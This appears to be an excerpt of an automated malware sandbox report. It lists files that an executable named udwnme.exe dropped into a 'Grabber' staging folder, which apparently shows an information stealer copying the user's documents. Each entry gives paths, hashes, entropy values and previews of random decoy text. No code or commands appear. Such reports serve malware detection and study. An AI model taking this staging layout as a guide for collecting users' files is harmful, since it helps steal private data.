                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAV